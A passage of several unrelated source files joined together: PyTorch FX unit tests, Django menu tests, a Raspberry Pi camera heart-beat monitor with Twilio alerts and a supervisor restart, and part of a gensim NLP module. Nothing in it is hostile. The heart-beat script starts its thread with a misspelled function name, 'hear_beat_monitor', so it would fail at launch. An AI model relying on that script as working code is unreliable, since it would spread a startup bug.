self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3), 6)
self.assertEqual(mod_false(3), 3)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertIn("Call using an FX-traced Module, line 4 of the "
"traced Module’s generated forward function:",
captured[0])
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotIn("Call using an FX-traced Module, line 4 of the"
" traced Module’s generated forward function:",
captured)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
@skipIfNoTorchVision
def test_cpatcher(self):
cnt = 0
def patched_impl(to_patch, args, kwargs):
nonlocal cnt
cnt += 1
return to_patch(*args, **kwargs)
c_patch_enabled = True
def patched_in(to_patch, args, kwargs):
nonlocal c_patch_enabled
try:
c_patch_enabled = False
r = patched_impl(to_patch, args, kwargs)
finally:
c_patch_enabled = True
return r
def trace_func(frame, action, arg):
if action == 'c_call':
if c_patch_enabled:
torch._C._fx.patch_function(arg, patched_in)
import torch
from torchvision.models.resnet import resnet18
rn = resnet18()
try:
sys.setprofile(trace_func)
rn(torch.rand(1, 3, 224, 224))
print("testing print patch")
finally:
sys.setprofile(None)
assert(cnt != 0)
def test_randn(self):
def f():
return torch.randn(3, 3)
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=False)
assert(all(i.target != torch.randn for i in fx_f.graph.nodes))
fx_f = symbolic_trace(f, enable_cpatching=True)
assert(any(i.target == torch.randn for i in fx_f.graph.nodes))
def run_getitem_target():
from torch.fx.symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
known_no_schema = {'stack', 'hstack', 'vstack', 'dstack', 'repeat', '__getitem__', 'linalg.multi_dot'}
try:
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
except Exception as e:
assert op.name in known_no_schema
instantiate_device_type_tests(TestOperatorSignatures, globals())
if __name__ == '__main__':
run_tests()
|
test_menu.py
|
import signal
import threading
import unittest
import sys
if sys.version_info > (3, 0):
from queue import Queue
else:
from Queue import Queue
from django.conf import settings
from django.template import Template, Context
from django.test import TestCase
from django.test.client import RequestFactory
from menu import Menu, MenuItem
# XXX TODO: test MENU_HIDE_EMPTY
class CustomMenuItem(MenuItem):
"""
Custom MenuItem subclass with custom check logic
"""
def check(self, request):
"""
We should be visible unless the request path ends with "foo"
"""
self.visible = not request.path.endswith("foo")
class MenuTests(TestCase):
"""
Tests for Menu
"""
def setUp(self):
"""
Build some menus for our tests
"""
self.kids3_2_desired_title = None
def kids3_2_title(request):
"Allow the title of kids3-2 to be changed"
if self.kids3_2_desired_title is not None:
return "-".join([request.path, self.kids3_2_desired_title])
return 'kids3-2'
def kids2_2_check(request):
"Hide kids2-2 whenever the request path ends with /hidden"
if request.path.endswith('/hidden'):
return False
return True
# Ensure we can pass children as tuples (or other iterables, like generators)
# Following the implementation of sorted children there was a bug reported due to children
# being passed as a tuple, which has no .sort method
# See: https://github.com/borgstrom/django-simple-menu/issues/38
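# (Clarifying note: kids2() below returns a reusable iterable rather than a list, and kids3
# further down is a plain tuple, so both of the non-list child containers mentioned above are
# exercised by this setup.)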
def kids2():
"Generator for kids2"
class RepeatIterator(object):
"We need this to be reusable -- http://stackoverflow.com/a/1985733"
def __iter__(self):
yield MenuItem("kids2-1", "/parent2/kids2-1", weight=999)
yield MenuItem("kids2-2", "/kids2-2", check=kids2_2_check)
return RepeatIterator()
def kids3_1(request):
"Callable for kids3-1"
return [
MenuItem("kids3-1-1", "/parent3/kids3-1/kid1", exact_url=True),
]
kids3 = (
CustomMenuItem("kids3-1", "/parent3/kids3-1", children=kids3_1, slug="salty"),
CustomMenuItem(kids3_2_title, "/parent3/kids3-2")
)
Menu.items = {}
Menu.sorted = {}
Menu.loaded = False
# add our items. Because we set weight to 999 for Parent 1 it will become the last item
# even though it's added first
Menu.add_item("test", MenuItem("Parent 1", "/parent1", weight=999))
Menu.add_item("test", MenuItem("Parent 2", "/parent2", children=kids2()))
Menu.add_item("test", MenuItem("Parent 3", "/parent3", children=kids3))
self.factory = RequestFactory()
def test_custom_menuitem(self):
"""
Ensure our custom check on our custom MenuItem works
"""
request = self.factory.get('/parent3/kids3-1')
items = Menu.process(request, 'test')
self.assertEqual(len(items[1].children), 2)
request = self.factory.get('/parent3/kids3-1/foo')
items = Menu.process(request, 'test')
self.assertEqual(len(items[1].children), 0)
def test_thread_safety_and_checks(self):
"""
Ensure our thread safety works; this also ensures our checks work
"""
# this shouldn't ever take more than 5 seconds, add a safety in case something breaks
signal.alarm(5)
def t1(results):
"Closure for thread 1"
request = self.factory.get('/kids2-2/visible')
items = Menu.process(request, 'test')
results.put_nowait(len(items[0].children) == 2)
def t2(results):
"Closure for thread 2"
request = self.factory.get('/kids2-2/hidden')
items = Menu.process(request, 'test')
results.put_nowait(len(items[0].children) == 1)
results = Queue()
for _ in range(50):
threads = [
threading.Thread(target=t1, args=(results,)),
threading.Thread(target=t2, args=(results,))
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertTrue(all([
results.get()
for _ in range(100)
]))
def test_slug(self):
"""
Ensure our slugification works as expected
"""
request = self.factory.get('/parent3/kids3-1')
items = Menu.process(request, 'test')
self.assertEqual(items[1].slug, "parent-3")
self.assertEqual(items[1].children[0].slug, "salty")
def test_exact_url(self):
"""
Ensure that the exact_url setting works
"""
# the extra stuff will still cause kids3-2 to be selected
request = self.factory.get('/parent3/kids3-2/extra_stuff_here')
items = Menu.process(request, 'test')
self.assertEqual(items[1].children[1].selected, True)
# but here it won't, because exact_url is set
request = self.factory.get('/parent3/kids3-1/kid1/extra_stuff_here')
items = Menu.process(request, 'test')
self.assertEqual(items[1].children[0].children[0].selected, False)
def test_callable_title(self):
"""
Ensure callable titles work
"""
self.kids3_2_desired_title = "fun"
request = self.factory.get('/parent3')
items = Menu.process(request, 'test')
self.assertEqual(items[1].children[1].title, "/parent3-fun")
def test_select_parents(self):
"""
Ensure the MENU_SELECT_PARENTS setting works
"""
settings.MENU_SELECT_PARENTS = False
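# (With MENU_SELECT_PARENTS disabled, an item is only selected when its own URL matches the
# request path; re-enabling it below also marks ancestors of a selected child as selected.)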
request = self.factory.get('/parent2/kids2-1')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, True)
self.assertEqual(items[0].children[1].selected, True)
self.assertEqual(items[1].selected, False)
request = self.factory.get('/kids2-2')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, False)
self.assertEqual(items[0].children[0].selected, True)
self.assertEqual(items[1].selected, False)
settings.MENU_SELECT_PARENTS = True
request = self.factory.get('/kids2-2')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, True)
self.assertEqual(items[0].children[0].selected, True)
self.assertEqual(items[1].selected, False)
request = self.factory.get('/parent3/kids3-1/kid1')
items = Menu.process(request, 'test')
self.assertEqual(items[0].selected, False)
self.assertEqual(items[0].children[1].selected, False)
self.assertEqual(items[1].selected, True)
self.assertEqual(items[1].children[0].selected, True)
self.assertEqual(items[1].children[0].children[0].selected, True)
self.assertEqual(items[1].children[1].selected, False)
self.assertEqual(items[2].selected, False)
def test_template_tag(self):
"""
Ensure the templating works
"""
request = self.factory.get('/parent3/kids3-1')
out = Template(
"{% load menu %}"
"{% generate_menu %}"
"{% for item in menus.test %}"
"{{ item.title }},"
"{% for child in item.children %}"
"{{ child.title }},"
"{% for grandchild in child.children %}"
"{{ grandchild.title }},"
"{% endfor %}"
"{% endfor %}"
"{% endfor %}"
).render(Context({
'request': request,
}))
self.assertEqual(out, "Parent 2,kids2-2,kids2-1,Parent 3,kids3-1,kids3-1-1,kids3-2,Parent 1,")
def test_template_tag_missing_attribute(self):
"""
Missing attributes should not raise exceptions in templates
"""
request = self.factory.get('/parent2/kids2-1')
out = Template(
"{% load menu %}"
"{% generate_menu %}"
"{% for item in menus.test %}"
"{{ item.title }}{{ item.doesntexist }},"
"{% endfor %}"
).render(Context({
'request': request,
}))
self.assertEqual(out, "Parent 2,Parent 3,Parent 1,")
class MenuItemTests(TestCase):
"""
Tests for MenuItem
"""
def test_kwargs(self):
"""
MenuItems should accept arbitrary keyword args
"""
item = MenuItem("test", "/test", arbitrary=True, dictionary={'a': 1})
self.assertTrue(item.arbitrary)
self.assertEqual(item.dictionary, {'a': 1})
self.assertRaises(AttributeError, lambda: item.nope)
|
heart_beat.py
|
# Set up a Message Queue server, which will receive images
# every N minutes, and heart beat signals every N seconds.
# New images will be stored on the SD card for forensics, and old images deleted to remove clutter/save space.
# Heart beats will be used to determine if the camera stream is alive (it may
# need to be restarted on some camera models).
# Log and notify the admin when the camera needs to be restarted.
# Usage: python heart_beat.py
import os
import pandas as pd
import imagezmq
import cv2
import traceback
import sys
import logging
from os import path, mkdir
import subprocess
import config
import time
import threading
from models import HeartBeat
from datetime import datetime, timedelta
from database import Session
from twilio.rest import Client
def is_healthy(heart_beat: HeartBeat) -> bool:
"""
Report whether the heart beat occurred within the
last N seconds, as per the config setting.
If True is returned, the heart beat is OK; otherwise the video stream
has been idle for too long.
"""
max_age = datetime.now() - timedelta(seconds=config.HEART_BEAT_INTERVAL_MAX_IDLE_N_SEC)
return heart_beat.create_ts >= max_age
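# Illustrative example (config value assumed, not taken from config.py): with
# HEART_BEAT_INTERVAL_MAX_IDLE_N_SEC = 60, a heart beat created 30 seconds ago is healthy,
# while one created 5 minutes ago is not.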
def fetch_last_heart_beat() -> HeartBeat:
"""Get last HeartBeat recorded in the DB"""
return (Session
.query(HeartBeat)
.order_by(HeartBeat.create_ts.desc())
.first())
def heart_beat_monitor():
"""
Run a heart beat check every N seconds:
- Check whether old heart-beat images need to be deleted
- If a heart beat is not detected within N seconds, restart the video capture process
"""
SLEEP_TIME = 30
prev_day = None
while True:
logging.debug('Heart beat triggered')
# ====================================
# === Delete old heart beat images ===
# ====================================
curr_day = datetime.now().day
if curr_day != prev_day:
logging.info('Check for old heart-beat image candidates for deletion')
# find all folders with images
all_im_folders = os.listdir(config.IMG_FOLDER)
# calculate dates to keep based on configuration
now = datetime.now()
min_date = now - timedelta(days=config.USE_HISTORICAL_DAYS)
keep_dates = [str(dt.date()) for dt in pd.date_range(min_date, now)]
# figure out candidates for image deletion
del_dirs = [dt for dt in all_im_folders if dt not in keep_dates]
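# e.g. (illustrative values): with USE_HISTORICAL_DAYS = 2 and now = 2021-03-10, keep_dates is
# ['2021-03-08', '2021-03-09', '2021-03-10'], so any other dated folder lands in del_dirs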
# walk through old directories and remove heart beat images
for dt in del_dirs:
logging.info(f'Checking folder for old heart beat images: {dt}')
dt_dir = f'{config.IMG_FOLDER}/{dt}'
for f in [f for f in os.listdir(dt_dir) if config.HEART_BEAT_FILES_IDENTIFIER in f]:
logging.info(f'Delete file: {f}')
os.unlink(f'{dt_dir}/{f}')
# set prev day to curr day
prev_day = curr_day
# ==================================
# === Detect frozen video stream ===
# ==================================
# grab last heart beat from the DB
last_heart_beat = fetch_last_heart_beat()
# determine if last heart beat occurred within specified time
heart_beat_status = is_healthy(last_heart_beat)
# if heart beat is not healthy - trigger notification
if not heart_beat_status:
# send text alert to admin
logging.info('Sending SMS Notification (heart beat detected frozen stream)')
try:
msg_body = f'Third Eye noticed a problem with the video stream. Backend process will be restarted'
client = Client(config.TWILIO_SID, config.TWILIO_AUTH_TOKEN)
for p in config.NOTIFY_PHONE_NUMBERS:
message = client.messages.create(body=msg_body, from_=config.TWILIO_PHONE_NUMBER, to=p)
sms_msg_sid = message.sid
logging.info(f'Message sent to Twilio, message id: {sms_msg_sid}')
except Exception as e:
logging.error(f'SMS error: {str(e)}')
# restart backend process
# construct command
CMD = f'/usr/bin/sudo /usr/bin/supervisorctl restart third-eye-backend'
logging.info(f'Executing cmd: {CMD}')
# execute CLI process
p = subprocess.Popen(CMD.split(' '), stdout=subprocess.PIPE)
out, err = p.communicate()
logging.info(str(out))
# wait for a while before going into next iteration
logging.debug(f'Waiting for {SLEEP_TIME} seconds')
time.sleep(SLEEP_TIME)
def main():
"""Collect messages from the message queue and save heart beats in the DB"""
try:
logging.info(f'Starting MQ server on {config.HEART_BEAT_SUB_URL}')
with imagezmq.ImageHub(open_port=config.HEART_BEAT_SUB_URL, REQ_REP=False) as image_hub:
logging.info(f'Ready to collect messages')
# keep track of current minute, as files will be saved once per minute
prev_min = None
while True: # receive images until Ctrl-C is pressed
dev_name, image = image_hub.recv_image()
# logging.debug(f'Heart beat received from {dev_name} with image shape {image.shape}')
# get current date/time
now = datetime.now()
# make sure we only save 1 file per minute (to save some space on the Pi)
curr_min = now.minute
if curr_min != prev_min:
date_folder = f'{config.IMG_FOLDER}/{str(now.date())}'
if not path.exists(date_folder):
mkdir(date_folder)
# save image in the images folder on each new minute
img_name = f"{str(now)[11:].replace(':', '')}_{config.HEART_BEAT_FILES_IDENTIFIER}.jpg"
cv2.imwrite(f'{date_folder}/{img_name}', image)
logging.info(f'Saving Heart-Beat file: {date_folder}/{img_name}')
prev_min = curr_min
# save heart beat in the DB
hb = HeartBeat(create_ts=datetime.now(), im_filename=f'{date_folder}/{img_name}')
Session.add(hb)
Session.commit()
except (KeyboardInterrupt, SystemExit):
pass # Ctrl-C was pressed to end program
except Exception as e:
logging.error(f'Python error with no Exception handler: {str(e)}')
logging.error(traceback.format_exc())
finally:
sys.exit()
if __name__ == '__main__':
logging.basicConfig(format=config.LOGGING_FORMAT, level=config.LOGGING_LEVEL, datefmt=config.LOGGING_DATE_FORMAT)
logger = logging.getLogger()
# kick off hear_beat_monitor in a separate thread
t = threading.Thread(target=hear_beat_monitor)
t.daemon = True
t.start()
# kick off main message subscriber in the main thread
main()
|
mlbrain.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
from core import utils
import os
import codecs
import pickle
import threading
import logging
from time import sleep
import hashlib
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from gensim import corpora
import gensim
from core.progressbar import ProgressBar, Percentage, Bar, ETA, FormatLabel, AnimatedMarker
from modules.mlbendermodule import MLBenderModule
from modules.nlp.mlnlp import MLNLP
from modules.concept.mlconcept import MLConcept
from core.utils import simple_tokenize, multi_sent_tokenize
wordTokenizer = RegexpTokenizer(u'\w+')
brain_mutex = threading.Lock()
brain_add_mutex = threading.Lock()
def save_brain_data(data_storage_path, questions, answers, questions_indexed, answers_indexed):
"""
This function is used to save the brain-data in a separate thread during Bender operations.
    The problem otherwise would be that, depending on data size, the user would have to wait
    quite some time for their response (until the save is finished).
The reason: Once BenderCore receives an answer from a HumanLogic, it tells the brain and
other modules to "learn" new data. After this learning, the brain needs to save itself to
hard disk, otherwise the data would get lost. Since this call happens in BenderCore just
in the "getResponse"-call, the return of the response to the REST-API would need to wait
until this save has been done.
Therefore, we do it in a separate thread.
It has actually no drawback as the newly learned data is still in RAM and can immediately
be used for next requests... (quite different from how it works in TextSimilarity and WMD)
"""
logger = logging.getLogger(os.path.basename(sys.argv[0]))
logger.info('Updating BRAIN DATA. Trying to get a mutex-lock...')
brain_mutex.acquire()
logger.info('Updating BRAIN DATA. successfully got a mutex-lock...')
try:
utils.safe_create_directory(data_storage_path)
data_file = os.path.join(data_storage_path, 'knowledge-raw.pickle')
knowledge = {'questions': questions, 'answers': answers}
pickle.dump(knowledge, open(data_file, 'wb'))
data_file = os.path.join(data_storage_path, 'knowledge-indexed.pickle')
knowledge = {'questions': questions_indexed, 'answers': answers_indexed}
pickle.dump(knowledge, open(data_file, 'wb'))
logger.info('Updating BRAIN DATA: Successfully updated brain-data...')
finally:
brain_mutex.release()
def iter_dictionary_documents(top_directory, remove_stop_words=True, stop_words=None):
"""
Iterate over all documents, yielding a document (=list of utf8 tokens) at a time.
Updated: 2016-12-29 13:28 CET, ISO
Fixed so many bugs, unbelievable :-()
"""
global wordTokenizer
errfile = codecs.open('/tmp/dict-errs.txt', 'w', 'utf-8')
if remove_stop_words and not stop_words:
stop_words = get_stop_words('en')
for root, dirs, files in os.walk(top_directory):
counter = 0
widgets=[FormatLabel(' | File: %(message)s [%(value)s/'+str(len(files))+']'), ' ', Percentage(), ' ', Bar(marker='@', left='[', right=']'), ' ', ETA()]
files.sort()
pBar = ProgressBar(widgets=widgets, maxval=len(files)).start()
for filename in filter(lambda filename: filename.endswith('.txt'), files):
counter += 1
pBar.update(counter, filename)
filename = os.path.join(root, filename)
lines = codecs.open(filename, 'r', 'utf-8').readlines() # read the entire file as an array of strings
for line in lines:
if '\t' in line:
# we don't need the questionID for the moment...
questionID, content = line.split('\t')
else:
content = line
content = content.strip().lower()
# content = ' '.join(content.split('\n')).lower() # join lines into one big string (just to make sure)
try:
# tokens = wordTokenizer.tokenize(content)
tokens = gensim.utils.simple_preprocess(content)
if remove_stop_words is True:
stopped_tokens = [i for i in tokens if not i in stop_words]
else:
stopped_tokens = tokens
yield stopped_tokens
except:
print('Token error in file [', filename, ']', file=errfile)
pBar.finish()
errfile.close()
def convert_train_data(brain):
questions = brain.getAllQuestions()
for i, question in enumerate(questions):
tokens = multi_sent_tokenize(question.strip().lower().split('\n'), return_as_single_array = True)
# gensim has issues with German words that a bit longer than usual
# text = ' '.join(question.strip().lower().split('\n'))
# text = text.strip()
# tokens = gensim.utils.simple_preprocess(text)
question_id = str(i)
yield question_id, tokens
"""
TrainingCorpus is a memory-friendly corpus generator to be used for training only.
Created: 2016-04-28 ??:?? CET, ISO
"""
class TrainingCorpus(gensim.corpora.TextCorpus):
def __init__(self, brain, dictionary, remove_stop_words=True, stop_words=None, **kwargs):
super(TrainingCorpus, self).__init__(**kwargs)
self.brain = brain
self.dictionary = dictionary
self.remove_stop_words = remove_stop_words
self.stop_words = stop_words
def get_texts(self):
"""
Iterate over all documents, yielding a document (=list of utf8 tokens) at a time.
Updated: 2016-12-29 13:28 CET, ISO
Fixed so many bugs, unbelievable :-()
"""
global wordTokenizer
length = 0
questions = self.brain.getAllQuestions()
for i, question in enumerate(questions):
content = gensim.utils.to_utf8(' '.join(question.strip().lower().split('\n')).strip())
try:
tokens = gensim.utils.simple_preprocess(content)
# tokens = simple_tokenize(content)
if self.remove_stop_words is True:
stopped_tokens = [i for i in tokens if not i in self.stop_words]
else:
stopped_tokens = tokens
length += 1
yield stopped_tokens
except:
print('Token error in file [', content, ']')
self.length = length
"""
class GensimDictionary
Generates a dictionary from files
This is a memory-friendly version of a dictionary generator...
"""
